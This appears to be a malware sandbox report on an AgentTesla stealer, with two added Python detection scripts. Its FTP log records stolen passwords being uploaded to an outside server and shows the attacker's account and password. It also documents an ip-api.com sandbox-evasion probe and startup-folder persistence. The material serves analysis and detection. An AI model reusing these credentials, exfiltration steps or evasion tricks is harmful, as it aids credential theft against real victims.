Jan 11, 2025 05:51:01.588135958 CET | 21 | 49707 | 162.241.62.63 | 192.168.2.5
Jan 11, 2025 05:51:01.588346958 CET | 49707 | 21 | 192.168.2.5 | 162.241.62.63
Jan 11, 2025 05:51:01.593199968 CET | 21 | 49707 | 162.241.62.63 | 192.168.2.5
Jan 11, 2025 05:51:01.700635910 CET | 21 | 49707 | 162.241.62.63 | 192.168.2.5
Jan 11, 2025 05:51:01.700783968 CET | 49707 | 21 | 192.168.2.5 | 162.241.62.63
Jan 11, 2025 05:51:01.705564022 CET | 21 | 49707 | 162.241.62.63 | 192.168.2.5
Jan 11, 2025 05:51:01.813110113 CET | 21 | 49707 | 162.241.62.63 | 192.168.2.5
Jan 11, 2025 05:51:01.813265085 CET | 49707 | 21 | 192.168.2.5 | 162.241.62.63
Jan 11, 2025 05:51:01.818094969 CET | 21 | 49707 | 162.241.62.63 | 192.168.2.5
Jan 11, 2025 05:51:01.925823927 CET | 21 | 49707 | 162.241.62.63 | 192.168.2.5
Jan 11, 2025 05:51:01.925992012 CET | 49707 | 21 | 192.168.2.5 | 162.241.62.63
Jan 11, 2025 05:51:01.930840969 CET | 21 | 49707 | 162.241.62.63 | 192.168.2.5
Jan 11, 2025 05:51:02.038559914 CET | 21 | 49707 | 162.241.62.63 | 192.168.2.5
Jan 11, 2025 05:51:02.039372921 CET | 49713 | 33214 | 192.168.2.5 | 162.241.62.63
Jan 11, 2025 05:51:02.044356108 CET | 33214 | 49713 | 162.241.62.63 | 192.168.2.5
Jan 11, 2025 05:51:02.044440985 CET | 49713 | 33214 | 192.168.2.5 | 162.241.62.63
Jan 11, 2025 05:51:02.044557095 CET | 49707 | 21 | 192.168.2.5 | 162.241.62.63
Jan 11, 2025 05:51:02.049344063 CET | 21 | 49707 | 162.241.62.63 | 192.168.2.5
Jan 11, 2025 05:51:02.441365957 CET | 21 | 49707 | 162.241.62.63 | 192.168.2.5
Jan 11, 2025 05:51:02.441601038 CET | 49713 | 33214 | 192.168.2.5 | 162.241.62.63
Jan 11, 2025 05:51:02.441907883 CET | 49713 | 33214 | 192.168.2.5 | 162.241.62.63
Jan 11, 2025 05:51:02.446516037 CET | 33214 | 49713 | 162.241.62.63 | 192.168.2.5
Jan 11, 2025 05:51:02.446830034 CET | 33214 | 49713 | 162.241.62.63 | 192.168.2.5
Jan 11, 2025 05:51:02.446903944 CET | 49713 | 33214 | 192.168.2.5 | 162.241.62.63
Jan 11, 2025 05:51:02.481695890 CET | 49707 | 21 | 192.168.2.5 | 162.241.62.63
Jan 11, 2025 05:51:02.571655989 CET | 21 | 49707 | 162.241.62.63 | 192.168.2.5
Jan 11, 2025 05:51:02.622337103 CET | 49707 | 21 | 192.168.2.5 | 162.241.62.63
Jan 11, 2025 05:51:42.354892015 CET | 80 | 49706 | 208.95.112.1 | 192.168.2.5
Jan 11, 2025 05:51:42.355618954 CET | 49706 | 80 | 192.168.2.5 | 208.95.112.1
Jan 11, 2025 05:51:50.763641119 CET | 49706 | 80 | 192.168.2.5 | 208.95.112.1
Jan 11, 2025 05:51:50.768595934 CET | 80 | 49706 | 208.95.112.1 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 05:50:47.889624119 CET | 52237 | 53 | 192.168.2.5 | 1.1.1.1
Jan 11, 2025 05:50:47.896445990 CET | 53 | 52237 | 1.1.1.1 | 192.168.2.5
Jan 11, 2025 05:50:49.011531115 CET | 64267 | 53 | 192.168.2.5 | 1.1.1.1
Jan 11, 2025 05:50:49.326802969 CET | 53 | 64267 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 05:50:47.889624119 CET | 192.168.2.5 | 1.1.1.1 | 0x45f7 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Jan 11, 2025 05:50:49.011531115 CET | 192.168.2.5 | 1.1.1.1 | 0xf262 | Standard query (0) | ftp.antoniomayol.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 05:50:47.896445990 CET | 1.1.1.1 | 192.168.2.5 | 0x45f7 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 05:50:49.326802969 CET | 1.1.1.1 | 192.168.2.5 | 0xf262 | No error (0) | ftp.antoniomayol.com | antoniomayol.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 05:50:49.326802969 CET | 1.1.1.1 | 192.168.2.5 | 0xf262 | No error (0) | antoniomayol.com | | 162.241.62.63 | A (IP address) | IN (0x0001) | false
                                        • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 208.95.112.1 | 80 | 5376 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 05:50:47.940356970 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Jan 11, 2025 05:50:48.389733076 CET | 175 | IN | HTTP/1.1 200 OK
                                        Date: Sat, 11 Jan 2025 04:50:47 GMT
                                        Content-Type: text/plain; charset=utf-8
                                        Content-Length: 6
                                        Access-Control-Allow-Origin: *
                                        X-Ttl: 60
                                        X-Rl: 44
                                        Data Raw: 66 61 6c 73 65 0a
                                        Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49706 | 208.95.112.1 | 80 | 6512 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 05:50:59.632908106 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Jan 11, 2025 05:51:00.103748083 CET | 175 | IN | HTTP/1.1 200 OK
                                        Date: Sat, 11 Jan 2025 04:50:59 GMT
                                        Content-Type: text/plain; charset=utf-8
                                        Content-Length: 6
                                        Access-Control-Allow-Origin: *
                                        X-Ttl: 48
                                        X-Rl: 43
                                        Data Raw: 66 61 6c 73 65 0a
                                        Data Ascii: false


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Jan 11, 2025 05:51:01.263539076 CET | 21 | 49707 | 162.241.62.63 | 192.168.2.5 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 4 of 150 allowed.
    220-Local time is now 22:51. Server port: 21.
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 15 minutes of inactivity.
Jan 11, 2025 05:51:01.263787031 CET | 49707 | 21 | 192.168.2.5 | 162.241.62.63 | USER johnson@antoniomayol.com
Jan 11, 2025 05:51:01.381006956 CET | 21 | 49707 | 162.241.62.63 | 192.168.2.5 | 331 User johnson@antoniomayol.com OK. Password required
Jan 11, 2025 05:51:01.381308079 CET | 49707 | 21 | 192.168.2.5 | 162.241.62.63 | PASS cMhKDQUk1{;%
Jan 11, 2025 05:51:01.588135958 CET | 21 | 49707 | 162.241.62.63 | 192.168.2.5 | 230-OK. Current restricted directory is /
    230 31 Kbytes used (0%) - authorized: 2048000 Kb
Jan 11, 2025 05:51:01.700635910 CET | 21 | 49707 | 162.241.62.63 | 192.168.2.5 | 504 Unknown command
Jan 11, 2025 05:51:01.700783968 CET | 49707 | 21 | 192.168.2.5 | 162.241.62.63 | PWD
Jan 11, 2025 05:51:01.813110113 CET | 21 | 49707 | 162.241.62.63 | 192.168.2.5 | 257 "/" is your current location
Jan 11, 2025 05:51:01.813265085 CET | 49707 | 21 | 192.168.2.5 | 162.241.62.63 | TYPE I
Jan 11, 2025 05:51:01.925823927 CET | 21 | 49707 | 162.241.62.63 | 192.168.2.5 | 200 TYPE is now 8-bit binary
Jan 11, 2025 05:51:01.925992012 CET | 49707 | 21 | 192.168.2.5 | 162.241.62.63 | PASV
Jan 11, 2025 05:51:02.038559914 CET | 21 | 49707 | 162.241.62.63 | 192.168.2.5 | 227 Entering Passive Mode (162,241,62,63,129,190)
Jan 11, 2025 05:51:02.044557095 CET | 49707 | 21 | 192.168.2.5 | 162.241.62.63 | STOR PW_user-226533_2025_01_10_23_51_00.html
Jan 11, 2025 05:51:02.441365957 CET | 21 | 49707 | 162.241.62.63 | 192.168.2.5 | 150 Accepted data connection
Jan 11, 2025 05:51:02.571655989 CET | 21 | 49707 | 162.241.62.63 | 192.168.2.5 | 226-31 Kbytes used (0%) - authorized: 2048000 Kb
    226-File successfully transferred
    226 0.114 seconds (measured here), 2.75 Kbytes per second
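Two things in the network data above are worth pulling out programmatically. The HTTP sessions are the check behind the report's "Check if machine is in data center or colocation facility" signature: the injected RegSvcs.exe asks ip-api.com for the `hosting` field of its own egress address and gets `false`, so it proceeds. The FTP session then carries the whole exfiltration in cleartext: the embedded account and password in USER/PASS, a PASV reply whose last two octets (129,190) encode the data port 129*256+190 = 33214 (the port the second Suricata alert fires on), and a STOR of the harvested-passwords report. The script below is an added example written for this page, not Joe Sandbox or AgentTesla code: the transcripts are constructed from the rows above (no TCP framing), and the assumption that report names generalise to any two-letter type prefix is the author's, since this capture shows only `PW_`.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed transcript mirroring the HTTP and FTP control-channel rows in the
# report above; it is not a packet capture and carries no TCP framing.
HTTP_REQUEST = ("GET /line/?fields=hosting HTTP/1.1\r\n"
                "Host: ip-api.com\r\nConnection: Keep-Alive\r\n\r\n")
HTTP_RESPONSE = ("HTTP/1.1 200 OK\r\nContent-Type: text/plain; charset=utf-8\r\n"
                 "Content-Length: 6\r\n\r\nfalse\n")
FTP_CONTROL = [  # (side, line): "C" = client 192.168.2.5, "S" = server 162.241.62.63
    ("S", "220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------"),
    ("C", "USER johnson@antoniomayol.com"),
    ("S", "331 User johnson@antoniomayol.com OK. Password required"),
    ("C", "PASS cMhKDQUk1{;%"),
    ("S", "230-OK. Current restricted directory is /"),
    ("C", "TYPE I"),
    ("S", "200 TYPE is now 8-bit binary"),
    ("C", "PASV"),
    ("S", "227 Entering Passive Mode (162,241,62,63,129,190)"),
    ("C", "STOR PW_user-226533_2025_01_10_23_51_00.html"),
    ("S", "150 Accepted data connection"),
    ("S", "226 File successfully transferred"),
]

# Upload names in this capture follow <type>_<user>_<YYYY_MM_DD_HH_MM_SS>.html;
# the report shows only PW_, so accepting any two-letter prefix is an assumption.
REPORT_NAME = re.compile(r"^[A-Z]{2}_\S+?_\d{4}(?:_\d{2}){5}\.html$")


def hosting_probe(request: str, response: str) -> Tuple[bool, Optional[bool]]:
    """Detect the ip-api.com 'fields=hosting' lookup and read its answer.
    Returns (is_probe, answered_true); 'true' means the egress IP sits in a
    hosting/datacenter range, which the sample treats as an analysis box."""
    request_line = request.split("\r\n", 1)[0]
    host = re.search(r"^Host:\s*(\S+)", request, re.M | re.I)
    if not host or host.group(1).lower() != "ip-api.com" or "fields=hosting" not in request_line:
        return False, None
    body = response.split("\r\n\r\n", 1)[1] if "\r\n\r\n" in response else ""
    return True, body.strip().lower() == "true"


def pasv_endpoint(reply: str) -> Optional[Tuple[str, int]]:
    """Decode '227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)' into (ip, port)."""
    m = re.search(r"\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)", reply)
    if not m:
        return None
    h1, h2, h3, h4, p1, p2 = map(int, m.groups())
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


@dataclass
class FtpSession:
    user: Optional[str] = None
    password: Optional[str] = None
    login_ok: bool = False
    data_endpoint: Optional[Tuple[str, int]] = None
    uploads: List[str] = field(default_factory=list)


def parse_ftp(lines) -> FtpSession:
    """Walk the control channel. FTP sends USER/PASS in cleartext, so the
    account the stealer embeds is recoverable straight from the wire."""
    s = FtpSession()
    for side, line in lines:
        verb, _, arg = line.partition(" ")
        if side == "C":
            verb = verb.upper()
            if verb == "USER":
                s.user = arg
            elif verb == "PASS":
                s.password = arg
            elif verb in ("STOR", "APPE"):
                s.uploads.append(arg)
        else:
            code = line[:3]
            if code == "230":
                s.login_ok = True
            elif code == "227":
                s.data_endpoint = pasv_endpoint(line)
    return s


def triage(request: str, response: str, ftp_lines) -> List[str]:
    """Combine both observations into the indicators an analyst would record."""
    out = []
    probe, in_dc = hosting_probe(request, response)
    if probe:
        out.append(f"anti-analysis: ip-api.com hosting probe, answer={'true' if in_dc else 'false'}")
    s = parse_ftp(ftp_lines)
    if s.login_ok and s.user:
        out.append(f"cleartext FTP credentials: {s.user} / {s.password}")
    for name in s.uploads:
        if REPORT_NAME.match(name):
            where = f"{s.data_endpoint[0]}:{s.data_endpoint[1]}" if s.data_endpoint else "unknown data port"
            out.append(f"exfil upload {name} via {where}")
    return out
```

`triage(HTTP_REQUEST, HTTP_RESPONSE, FTP_CONTROL)` yields three indicators: the hosting probe answered `false`, the FTP account and password, and the PW_ report pushed to 162.241.62.63:33214. Decoding the PASV reply is what lets you tie the control-channel STOR to the separate data-channel flow that the Suricata `ETPRO MALWARE Agent Tesla CnC Exfil Activity` alert matched.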


                                        Target ID:0
                                        Start time:23:50:44
                                        Start date:10/01/2025
                                        Path:C:\Users\user\Desktop\toIuQILmr1.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\toIuQILmr1.exe"
                                        Imagebase:0xdd0000
                                        File size:613'376 bytes
                                        MD5 hash:9B46500828B338EB4CDA1D49BED1F791
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:2
                                        Start time:23:50:45
                                        Start date:10/01/2025
                                        Path:C:\Users\user\AppData\Local\kinematical\outvaunts.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\toIuQILmr1.exe"
                                        Imagebase:0xc50000
                                        File size:613'376 bytes
                                        MD5 hash:9B46500828B338EB4CDA1D49BED1F791
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                        • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 71%, ReversingLabs
                                        • Detection: 76%, Virustotal, Browse
                                        Reputation:low
                                        Has exited:true

                                        Target ID:3
                                        Start time:23:50:46
                                        Start date:10/01/2025
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\toIuQILmr1.exe"
                                        Imagebase:0x4c0000
                                        File size:45'984 bytes
                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2187480515.00000000027EE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2184485388.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2184485388.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2187480515.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2187480515.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:23:50:56
                                        Start date:10/01/2025
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs"
                                        Imagebase:0x7ff79e710000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:5
                                        Start time:23:50:57
                                        Start date:10/01/2025
                                        Path:C:\Users\user\AppData\Local\kinematical\outvaunts.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Local\kinematical\outvaunts.exe"
                                        Imagebase:0xc50000
                                        File size:613'376 bytes
                                        MD5 hash:9B46500828B338EB4CDA1D49BED1F791
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                        • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                        Reputation:low
                                        Has exited:true

                                        Target ID:6
                                        Start time:23:50:58
                                        Start date:10/01/2025
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Local\kinematical\outvaunts.exe"
                                        Imagebase:0x7b0000
                                        File size:45'984 bytes
                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.4511232795.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.4511232795.0000000002B6E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:false
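The process table above records three behaviours that a detection engineer would want to express as rules rather than read by eye. RegSvcs.exe (targets 3 and 6) runs under the command line of the loader that spawned it, and the copy outvaunts.exe (target 2) runs under the original sample's command line: an image whose mapped executable does not match the program named on its command line is what process hollowing or injection leaves behind (the report's "Maps a DLL or memory area into another process"). wscript.exe (target 4) executes outvaunts.vbs from the per-user Startup folder, the persistence the "Drops VBS files to the startup folder" signature describes. And targets 2 and 5 carry the submitted sample's MD5 while running from AppData\Local. The script below is an added example written for this page, not Joe Sandbox code: the process records are copied from the table above into constants, parent/child links are not in the table and are not used, and the rule names and the set of script extensions are the author's choices.

```python
import ntpath
from dataclasses import dataclass
from typing import Dict, List

# Constructed from the process table above (values copied from the report, not live telemetry).
SAMPLE_PATH = r"C:\Users\user\Desktop\toIuQILmr1.exe"
SAMPLE_MD5 = "9B46500828B338EB4CDA1D49BED1F791"
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
REGSVCS_MD5 = "9D352BC46709F0CB5EC974633A0C3C94"
COPY = r"C:\Users\user\AppData\Local\kinematical\outvaunts.exe"


@dataclass(frozen=True)
class Proc:
    target: int
    path: str      # image actually mapped (Joe's "Path")
    cmdline: str   # command line the process was created with
    md5: str


PROCS = [
    Proc(0, SAMPLE_PATH, f'"{SAMPLE_PATH}"', SAMPLE_MD5),
    Proc(2, COPY, f'"{SAMPLE_PATH}"', SAMPLE_MD5),
    Proc(3, REGSVCS, f'"{SAMPLE_PATH}"', REGSVCS_MD5),
    Proc(4, r"C:\Windows\System32\wscript.exe",
         r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs"',
         "A47CBE969EA935BDD3AB568BB126BC80"),
    Proc(5, COPY, f'"{COPY}"', SAMPLE_MD5),
    Proc(6, REGSVCS, f'"{COPY}"', REGSVCS_MD5),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf")  # author's choice of script types


def cmdline_image(cmdline: str) -> str:
    """First token of a Windows command line, honouring a quoted image path."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(None, 1)[0] if cmdline else ""


def image_cmdline_mismatch(p: Proc) -> bool:
    """The executable mapped into the process differs from the one named on its
    command line: a loader created a host (here RegSvcs.exe) and replaced or
    injected into its memory, or launched a copy under the original's arguments."""
    return ntpath.basename(p.path).lower() != ntpath.basename(cmdline_image(p.cmdline)).lower()


def startup_folder_script(p: Proc) -> bool:
    """A script host running a script that lives in the per-user Startup folder."""
    if ntpath.basename(p.path).lower() not in SCRIPT_HOSTS:
        return False
    rest = p.cmdline.lower()
    return "\\start menu\\programs\\startup\\" in rest and rest.rstrip('"').endswith(SCRIPT_EXTS)


def sample_copy_executed(p: Proc, sample_md5: str, sample_path: str) -> bool:
    """Same bytes as the submitted sample, running from a different location."""
    return p.md5.lower() == sample_md5.lower() and p.path.lower() != sample_path.lower()


def analyse(procs, sample_md5: str = SAMPLE_MD5, sample_path: str = SAMPLE_PATH) -> Dict[int, List[str]]:
    """Map each flagged target ID to the rule names it triggered."""
    hits: Dict[int, List[str]] = {}
    for p in procs:
        reasons = []
        if image_cmdline_mismatch(p):
            reasons.append("image_cmdline_mismatch")
        if startup_folder_script(p):
            reasons.append("startup_folder_script")
        if sample_copy_executed(p, sample_md5, sample_path):
            reasons.append("sample_copy_executed")
        if reasons:
            hits[p.target] = reasons
    return hits
```

`analyse(PROCS)` flags every process except the original sample (target 0): targets 3 and 6 for the image/command-line mismatch on RegSvcs.exe, target 2 for both the mismatch and the relocated copy, target 5 for the copy alone, and target 4 for the Startup-folder script. Against real endpoint telemetry the same three predicates apply to process-creation events that carry image path, command line and file hash.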


                                          Execution Graph

                                          Execution Coverage:3.6%
                                          Dynamic/Decrypted Code Coverage:0.4%
                                          Signature Coverage:8.6%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:71
98350->98116 98351->98111 98352->98111 98353->98123 98354->98133 98355->98134 98356->98134 98357->98131 98358->98137 98359->98176 98360->98176 98361->98176 98362->98176 98365 dd862b 98363->98365 98366 dd8652 98365->98366 99692 dd8b13 69 API calls Mailbox 98365->99692 98366->98161 98367->98111 98368->98162 98370 dd81ba 98369->98370 98371 dd81b2 98369->98371 98370->98167 98372 dd80d7 59 API calls 98371->98372 98372->98370 98373->98171 98374->98111 98376 dd7fc2 98375->98376 98378 dd7fbf _memmove 98375->98378 98377 df0ff6 Mailbox 59 API calls 98376->98377 98377->98378 98378->98230 98379->98233 98380->98241 98382 dde59d 98381->98382 98383 dde5b1 98381->98383 98485 dde060 331 API calls 2 library calls 98382->98485 98486 e3a0b5 89 API calls 4 library calls 98383->98486 98385 dde5a8 98385->98319 98387 e13ece 98387->98387 98389 dde835 98388->98389 98390 e13ed3 98389->98390 98393 dde89f 98389->98393 98402 dde8f9 98389->98402 98391 dda000 331 API calls 98390->98391 98392 e13ee8 98391->98392 98416 ddead0 Mailbox 98392->98416 98491 e3a0b5 89 API calls 4 library calls 98392->98491 98395 dd77c7 59 API calls 98393->98395 98393->98402 98394 dd77c7 59 API calls 98394->98402 98397 e13f2e 98395->98397 98492 df2f80 98397->98492 98398 df2f80 __cinit 67 API calls 98398->98402 98400 e13f50 98400->98319 98401 dd8620 69 API calls 98401->98416 98402->98394 98402->98398 98402->98400 98405 ddeaba 98402->98405 98402->98416 98403 dda000 331 API calls 98403->98416 98405->98416 98495 e3a0b5 89 API calls 4 library calls 98405->98495 98406 ddf2f5 98499 e3a0b5 89 API calls 4 library calls 98406->98499 98410 e1424f 98410->98319 98411 dd8ea0 59 API calls 98411->98416 98413 e3a0b5 89 API calls 98413->98416 98416->98401 98416->98403 98416->98406 98416->98411 98416->98413 98418 ddebd8 98416->98418 98487 dd80d7 98416->98487 98496 e27405 59 API calls 98416->98496 98497 e4c8d7 331 API calls 98416->98497 98498 e4b851 331 API calls Mailbox 98416->98498 98500 dd9df0 59 API calls Mailbox 98416->98500 98501 
e496db 331 API calls Mailbox 98416->98501 98418->98319 98420 ddf61a 98419->98420 98421 ddf7b0 98419->98421 98423 e14848 98420->98423 98424 ddf626 98420->98424 98422 dd7f41 59 API calls 98421->98422 98427 ddf6ec Mailbox 98422->98427 98680 e4bf80 331 API calls Mailbox 98423->98680 98678 ddf3f0 331 API calls 2 library calls 98424->98678 98580 e3cde5 98427->98580 98660 e4474d 98427->98660 98669 dd4faa 98427->98669 98675 e33e73 98427->98675 98428 e14856 98429 ddf790 98428->98429 98681 e3a0b5 89 API calls 4 library calls 98428->98681 98429->98319 98431 ddf65d 98431->98427 98431->98428 98431->98429 98433 ddf743 98433->98429 98679 dd9df0 59 API calls Mailbox 98433->98679 98438->98319 98439->98250 98440->98255 98441->98319 98442->98254 98443->98254 98444->98254 98445->98319 98446->98319 98447->98319 98449 dd99b1 98448->98449 98457 dd99ab 98448->98457 98450 e0f9fc __i64tow 98449->98450 98451 e0f903 98449->98451 98452 dd99f9 98449->98452 98456 dd99b7 __itow 98449->98456 98459 df0ff6 Mailbox 59 API calls 98451->98459 98464 e0f97b Mailbox _wcscpy 98451->98464 99684 df38d8 83 API calls 3 library calls 98452->99684 98455 df0ff6 Mailbox 59 API calls 98458 dd99d1 98455->98458 98456->98455 98457->98319 98458->98457 98460 dd7f41 59 API calls 98458->98460 98461 e0f948 98459->98461 98460->98457 98462 df0ff6 Mailbox 59 API calls 98461->98462 98463 e0f96e 98462->98463 98463->98464 98465 dd7f41 59 API calls 98463->98465 99685 df38d8 83 API calls 3 library calls 98464->99685 98465->98464 98466->98319 98467->98319 98468->98319 98470 df0ff6 Mailbox 59 API calls 98469->98470 98471 dd77e8 98470->98471 98472 df0ff6 Mailbox 59 API calls 98471->98472 98473 dd77f6 98472->98473 98473->98304 98474->98304 98475->98304 98477 dd7f50 __wsetenvp _memmove 98476->98477 98478 df0ff6 Mailbox 59 API calls 98477->98478 98479 dd7f8e 98478->98479 98479->98304 98480->98304 98481->98304 98482->98304 98483->98304 98484->98304 98485->98385 98486->98387 98488 dd80fa _memmove 98487->98488 98489 dd80e7 98487->98489 
98488->98416 98489->98488 98490 df0ff6 Mailbox 59 API calls 98489->98490 98490->98488 98491->98416 98502 df2e84 98492->98502 98494 df2f8b 98494->98402 98495->98416 98496->98416 98497->98416 98498->98416 98499->98410 98500->98416 98501->98416 98503 df2e90 __tzset_nolock 98502->98503 98510 df3457 98503->98510 98509 df2eb7 __tzset_nolock 98509->98494 98527 df9e4b 98510->98527 98512 df2e99 98513 df2ec8 RtlDecodePointer RtlDecodePointer 98512->98513 98514 df2ea5 98513->98514 98515 df2ef5 98513->98515 98524 df2ec2 98514->98524 98515->98514 98573 df89e4 59 API calls __cftof_l 98515->98573 98517 df2f58 RtlEncodePointer RtlEncodePointer 98517->98514 98518 df2f07 98518->98517 98519 df2f2c 98518->98519 98574 df8aa4 61 API calls 2 library calls 98518->98574 98519->98514 98522 df2f46 RtlEncodePointer 98519->98522 98575 df8aa4 61 API calls 2 library calls 98519->98575 98522->98517 98523 df2f40 98523->98514 98523->98522 98576 df3460 98524->98576 98528 df9e6f RtlEnterCriticalSection 98527->98528 98529 df9e5c 98527->98529 98528->98512 98534 df9ed3 98529->98534 98531 df9e62 98531->98528 98558 df32f5 58 API calls 3 library calls 98531->98558 98535 df9edf __tzset_nolock 98534->98535 98536 df9ee8 98535->98536 98537 df9f00 98535->98537 98559 dfa3ab 58 API calls __NMSG_WRITE 98536->98559 98550 df9f21 __tzset_nolock 98537->98550 98562 df8a5d 58 API calls 2 library calls 98537->98562 